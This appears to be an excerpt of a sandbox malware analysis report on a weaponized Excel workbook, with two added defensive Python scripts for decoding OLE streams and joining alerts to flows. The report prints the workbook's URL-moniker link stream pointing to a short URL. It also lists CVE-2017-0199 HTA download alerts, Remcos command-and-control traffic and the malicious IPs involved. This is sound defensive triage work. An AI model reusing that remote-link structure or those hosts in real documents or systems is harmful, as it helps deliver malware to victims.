                                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                              CLSID:
                                              File Type:data
                                              Stream Size:2644
                                              Entropy:3.9810373578775673
                                              Base64 Encoded:False
                                              Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                              Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                              CLSID:
                                              File Type:data
                                              Stream Size:553
                                              Entropy:6.374373352731627
                                              Base64 Encoded:True
                                              Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
                                              Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 86 91 ef 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
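The two stream dumps above that matter for triage are the link stream whose Data Raw line begins `01 00 00 02` and the Workbook stream whose line begins `09 08 10 00`. The Data ASCII rendering of the first one (`h . t . t . p . s`) is a UTF-16LE string shown byte by byte, and it sits right after the 16-byte CLSID `e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b`, which is `{79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}`, the standard URL moniker. The following script is an added example, not part of the Joe Sandbox report or its tooling: it decodes exactly those bytes, recovers the moniker's declared length and URL, and recognises the BIFF8 BOF record at the start of the Workbook stream. The two hex strings are copied from the report's Data Raw lines; the function and constant names are the example's own.

```python
"""Identify what an OLE stream dumped in a sandbox report actually contains."""
import struct
import uuid

# CLSID_StdURLMoniker. A serialized URL moniker in an OLE link stream means the
# embedded object is fetched from that URL when the document is opened, which is
# the mechanism the CVE-2017-0199 alerts in this report refer to.
URL_MONIKER_CLSID = uuid.UUID("79EAC9E0-BAF9-11CE-8C82-00AA004BA90B")

# BIFF BOF record: id 0x0809, then record length, BIFF version and substream type.
BIFF_BOF_ID = 0x0809
BIFF8_VERSION = 0x0600
BIFF_SUBSTREAM_TYPES = {0x0005: "workbook globals", 0x0010: "worksheet",
                        0x0020: "chart", 0x0040: "macro sheet"}

# Sample input copied from this report: the first 128 bytes of the link stream
# (Data Raw line beginning 01 00 00 02) and the first 16 bytes of the Workbook
# stream (Data Raw line beginning 09 08 10 00).
LINK_STREAM_HEX = (
    "01 00 00 02 b1 4f 02 0a 9d 57 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 "
    "1a 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 16 01 00 00 "
    "68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 7a 00 65 00 65 00 70 00 "
    "2e 00 6c 00 79 00 2f 00 79 00 44 00 66 00 76 00 68 00 00 00 cd 13 3e 17 "
    "a3 09 24 ab 8b 8a 6b b5 8c 8e 30 1a a3 71 a2 bb 03 33 43 c7 51 ba 2c e8 "
    "e3 0b 49 95 0b 95 95 40"
)
WORKBOOK_STREAM_HEX = "09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00"


def from_hex(dump):
    """Turn a space-separated hex dump as printed in the report into bytes."""
    return bytes.fromhex(dump)


def read_utf16z(data, start):
    """Read a NUL-terminated UTF-16LE string. Returns (text, end_offset, terminated)."""
    i = start
    while i + 1 < len(data):
        if data[i] == 0 and data[i + 1] == 0:
            return data[start:i].decode("utf-16-le", "replace"), i + 2, True
        i += 2
    return data[start:].decode("utf-16-le", "replace"), len(data), False


def find_url_monikers(data):
    """Locate every serialized URL moniker: CLSID, DWORD body length, UTF-16LE URL."""
    hits = []
    needle = URL_MONIKER_CLSID.bytes_le   # on-disk byte order of the GUID
    pos = data.find(needle)
    while pos != -1:
        body = pos + 16
        if body + 4 > len(data):
            break
        (declared,) = struct.unpack_from("<I", data, body)
        url, end, terminated = read_utf16z(data, body + 4)
        hits.append({
            "offset": pos,
            "url": url,
            "declared_len": declared,
            "terminated": terminated,
            # A dump shorter than the declared body means the report cut the stream off.
            "truncated": body + 4 + declared > len(data),
        })
        pos = data.find(needle, end)
    return hits


def parse_biff_bof(data):
    """Return BOF details if the stream starts with a BIFF BOF record, else None."""
    if len(data) < 8:
        return None
    rec_id, rec_len, version, substream = struct.unpack_from("<HHHH", data, 0)
    if rec_id != BIFF_BOF_ID:
        return None
    return {"version": version, "biff8": version == BIFF8_VERSION,
            "substream": BIFF_SUBSTREAM_TYPES.get(substream, "unknown (0x%04x)" % substream)}


def classify_stream(data):
    """Tags a triager cares about: workbook stream, and any remote link targets."""
    tags = []
    bof = parse_biff_bof(data)
    if bof:
        tags.append("BIFF workbook stream (%s)" % bof["substream"])
    for hit in find_url_monikers(data):
        tags.append("URL moniker -> " + hit["url"])
    return tags


if __name__ == "__main__":
    for name, dump in (("link stream", LINK_STREAM_HEX), ("Workbook", WORKBOOK_STREAM_HEX)):
        print(name, classify_stream(from_hex(dump)))
```

Two things the decoded bytes make explicit that the report's labels do not: the moniker's declared body length is 0x116 (278) bytes while only 128 bytes are dumped, so whatever follows the URL terminator is not visible on this page; and the Workbook stream's `09 08 10 00 00 06 05 00` is a BIFF8 BOF record for the workbook-globals substream, which is why libmagic's "Applesoft BASIC program data" label on that stream should be read as a false match rather than as a finding.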
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-09T17:48:56.908349+0200 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49164 | 185.235.137.223 | 80 | TCP
2024-09-09T17:48:56.908351+0200 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 185.235.137.223 | 80 | 192.168.2.22 | 49164 | TCP
2024-09-09T17:48:59.517853+0200 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49166 | 185.235.137.223 | 80 | TCP
2024-09-09T17:48:59.517862+0200 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 185.235.137.223 | 80 | 192.168.2.22 | 49166 | TCP
2024-09-09T17:49:12.632846+0200 | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 1 | 207.241.227.96 | 443 | 192.168.2.22 | 49168 | TCP
2024-09-09T17:49:13.605287+0200 | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 185.235.137.223 | 80 | 192.168.2.22 | 49169 | TCP
2024-09-09T17:49:13.605287+0200 | 2020425 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 | 1 | 185.235.137.223 | 80 | 192.168.2.22 | 49169 | TCP
2024-09-09T17:49:15.269324+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49170 | 192.3.101.29 | 14645 | TCP
2024-09-09T17:49:16.723246+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49171 | 192.3.101.29 | 14645 | TCP
2024-09-09T17:49:16.819096+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.22 | 49172 | 178.237.33.50 | 80 | TCP
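The alert table and the packet listing that follows describe the same handful of TCP connections from two angles, and the useful triage step is to join them per flow: which client port talked to which server, how much traffic went each way, and which signatures fired on it. The script below is an added example, not part of the report or of Joe Sandbox: it normalises each packet and alert 4-tuple to a client/server key (using the Windows dynamic port range 49152 and up to decide which end is the client, an assumption that holds for this sandbox but not for every capture), counts packets per direction, attaches alerts, and filters on Suricata priority. The embedded rows are transcribed from this report's alert table and packet listing; the record and function names are the example's own.

```python
"""Join a sandbox packet listing with its IDS alerts into per-flow triage records."""
from dataclasses import dataclass, field

# Assumption: the client picks ports from the IANA dynamic range, as Windows
# (Vista and later) does. Adjust for captures from other client stacks.
EPHEMERAL_MIN = 49152

# Constructed sample: five rows transcribed from this report's Suricata alert table
# (timestamp, SID, signature, severity, src IP, src port, dst IP, dst port).
ALERTS = [
    ("2024-09-09T17:48:56.908349+0200", 2024449,
     "ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl", 1,
     "192.168.2.22", 49164, "185.235.137.223", 80),
    ("2024-09-09T17:48:56.908351+0200", 2024197,
     "ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)", 1,
     "185.235.137.223", 80, "192.168.2.22", 49164),
    ("2024-09-09T17:49:12.632846+0200", 2049038,
     "ET MALWARE Malicious Base64 Encoded Payload In Image", 1,
     "207.241.227.96", 443, "192.168.2.22", 49168),
    ("2024-09-09T17:49:15.269324+0200", 2036594,
     "ET JA3 Hash - Remcos 3.x/4.x TLS Connection", 1,
     "192.168.2.22", 49170, "192.3.101.29", 14645),
    ("2024-09-09T17:49:16.819096+0200", 2803304,
     "ETPRO MALWARE Common Downloader Header Pattern HCa", 3,
     "192.168.2.22", 49172, "178.237.33.50", 80),
]

# Constructed sample: eight rows transcribed from this report's packet listing
# (timestamp, src port, dst port, src IP, dst IP).
PACKETS = [
    ("Sep 9, 2024 17:48:55.145525932 CEST", 49163, 443, "192.168.2.22", "95.217.202.210"),
    ("Sep 9, 2024 17:48:55.145581007 CEST", 443, 49163, "95.217.202.210", "192.168.2.22"),
    ("Sep 9, 2024 17:48:55.145653009 CEST", 49163, 443, "192.168.2.22", "95.217.202.210"),
    ("Sep 9, 2024 17:48:56.268775940 CEST", 49164, 80, "192.168.2.22", "185.235.137.223"),
    ("Sep 9, 2024 17:48:56.274200916 CEST", 80, 49164, "185.235.137.223", "192.168.2.22"),
    ("Sep 9, 2024 17:48:56.275407076 CEST", 49164, 80, "192.168.2.22", "185.235.137.223"),
    ("Sep 9, 2024 17:48:56.908236980 CEST", 80, 49164, "185.235.137.223", "192.168.2.22"),
    ("Sep 9, 2024 17:48:56.908268929 CEST", 80, 49164, "185.235.137.223", "192.168.2.22"),
]


@dataclass
class Flow:
    client: str
    cport: int
    server: str
    sport: int
    first_seen: str
    pkts_out: int = 0                              # client -> server
    pkts_in: int = 0                               # server -> client
    alerts: list = field(default_factory=list)     # (sid, severity, signature)


def flow_key(src, sport, dst, dport):
    """Normalise a 4-tuple to (client, cport, server, sport) and report the packet's direction."""
    if sport >= EPHEMERAL_MIN and dport < EPHEMERAL_MIN:
        return (src, sport, dst, dport), "out"
    if dport >= EPHEMERAL_MIN and sport < EPHEMERAL_MIN:
        return (dst, dport, src, sport), "in"
    # Both or neither side ephemeral: fall back to a deterministic ordering.
    if (src, sport) <= (dst, dport):
        return (src, sport, dst, dport), "out"
    return (dst, dport, src, sport), "in"


def build_flows(packets, alerts):
    flows = {}
    for ts, sp, dp, src, dst in packets:
        key, direction = flow_key(src, sp, dst, dp)
        flow = flows.setdefault(key, Flow(*key, first_seen=ts))
        if direction == "out":
            flow.pkts_out += 1
        else:
            flow.pkts_in += 1
    for ts, sid, sig, sev, src, sp, dst, dp in alerts:
        key, _ = flow_key(src, sp, dst, dp)
        # An alert whose packets are missing from the listing still gets a record:
        # report packet listings are often truncated, the alert table is not.
        flow = flows.setdefault(key, Flow(*key, first_seen=ts))
        flow.alerts.append((sid, sev, sig))
    return flows


def triage(flows, max_severity=1):
    """Flows carrying at least one alert at or above the given priority (Suricata: 1 is highest)."""
    hits = [f for f in flows.values() if any(sev <= max_severity for _, sev, _ in f.alerts)]
    return sorted(hits, key=lambda f: f.cport)


def report(flows):
    """One line per flow, ordered by client port so it reads like the capture."""
    lines = []
    for f in sorted(flows.values(), key=lambda f: f.cport):
        sids = ",".join(str(sid) for sid, _, _ in f.alerts) or "-"
        lines.append("%s:%d -> %s:%d  out=%d in=%d  alerts=%s"
                     % (f.client, f.cport, f.server, f.sport, f.pkts_out, f.pkts_in, sids))
    return lines


if __name__ == "__main__":
    print("\n".join(report(build_flows(PACKETS, ALERTS))))
```

Run against the full tables rather than the sample rows, the join shows what the fused listing hides: the TLS session to 95.217.202.210:443 on port 49163 precedes the HTA download from 185.235.137.223:80 on 49164 and carries no alert, the Remcos JA3 hits are on 49170 and 49171 towards 192.3.101.29:14645, and the only priority-3 alert (the ETPRO downloader header) is on a separate flow to 178.237.33.50. The filter on priority is deliberate: on a page like this, severity 1 alerts on a flow are the signal, and the count of packets per direction is the quickest sanity check that a download actually completed.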
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 9, 2024 17:48:55.145525932 CEST | 49163 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:55.145581007 CEST | 443 | 49163 | 95.217.202.210 | 192.168.2.22
Sep 9, 2024 17:48:55.145653009 CEST | 49163 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:55.150844097 CEST | 49163 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:55.150883913 CEST | 443 | 49163 | 95.217.202.210 | 192.168.2.22
Sep 9, 2024 17:48:55.833237886 CEST | 443 | 49163 | 95.217.202.210 | 192.168.2.22
Sep 9, 2024 17:48:55.833525896 CEST | 49163 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:55.837750912 CEST | 49163 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:55.837785006 CEST | 443 | 49163 | 95.217.202.210 | 192.168.2.22
Sep 9, 2024 17:48:55.838339090 CEST | 443 | 49163 | 95.217.202.210 | 192.168.2.22
Sep 9, 2024 17:48:55.838404894 CEST | 49163 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:55.905481100 CEST | 49163 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:55.951410055 CEST | 443 | 49163 | 95.217.202.210 | 192.168.2.22
Sep 9, 2024 17:48:56.250272036 CEST | 443 | 49163 | 95.217.202.210 | 192.168.2.22
Sep 9, 2024 17:48:56.250458956 CEST | 443 | 49163 | 95.217.202.210 | 192.168.2.22
Sep 9, 2024 17:48:56.250498056 CEST | 49163 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:56.250535011 CEST | 49163 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:56.250643015 CEST | 49163 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:56.250665903 CEST | 443 | 49163 | 95.217.202.210 | 192.168.2.22
Sep 9, 2024 17:48:56.250675917 CEST | 49163 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:56.250720024 CEST | 49163 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:56.268775940 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.274200916 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.275407076 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.275407076 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.280210018 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.908236980 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.908268929 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.908297062 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.908314943 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.908349037 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.908350945 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.908366919 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.908379078 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.908396959 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.908406019 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.908409119 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.908447981 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.908488989 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.908513069 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.908535004 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.908535004 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.908552885 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.908572912 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.913536072 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.913603067 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.913619041 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.913624048 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.913644075 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.913677931 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.913677931 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.913714886 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.914771080 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.993530989 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.993624926 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.998641014 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.998667955 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.998686075 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.998686075 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.998703003 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.998719931 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.998748064 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.998764038 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.998783112 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.998801947 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.998859882 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.998877048 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.998894930 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.998907089 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.998980045 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.999025106 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.999701977 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.999736071 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.999743938 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.999753952 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.999773979 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.999788046 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:56.999825001 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:56.999865055 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.000210047 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.000248909 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.000261068 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.000277042 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.000299931 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.000315905 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.000395060 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.000410080 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.000432968 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.000446081 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.000962019 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.001009941 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.001013041 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.001029015 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.001048088 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.001060009 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.001143932 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.001158953 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.001174927 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.001192093 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.001207113 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.001878977 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.001914978 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.001920938 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.001951933 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.089308977 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.089348078 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.089361906 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.089376926 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.089385033 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.089394093 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.089417934 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.089449883 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.089534044 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.089593887 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.089627028 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.089644909 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.089679956 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.089875937 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.089927912 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.089931965 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.089950085 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.089987993 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.090063095 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.090081930 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.090121984 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.090589046 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.090642929 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.090747118 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.090775967 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.090792894 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.090821981 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.091433048 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.091450930 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.091483116 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.091487885 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.091502905 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.091512918 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.091541052 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.091552019 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.091604948 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.091604948 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.091677904 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.091690063 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
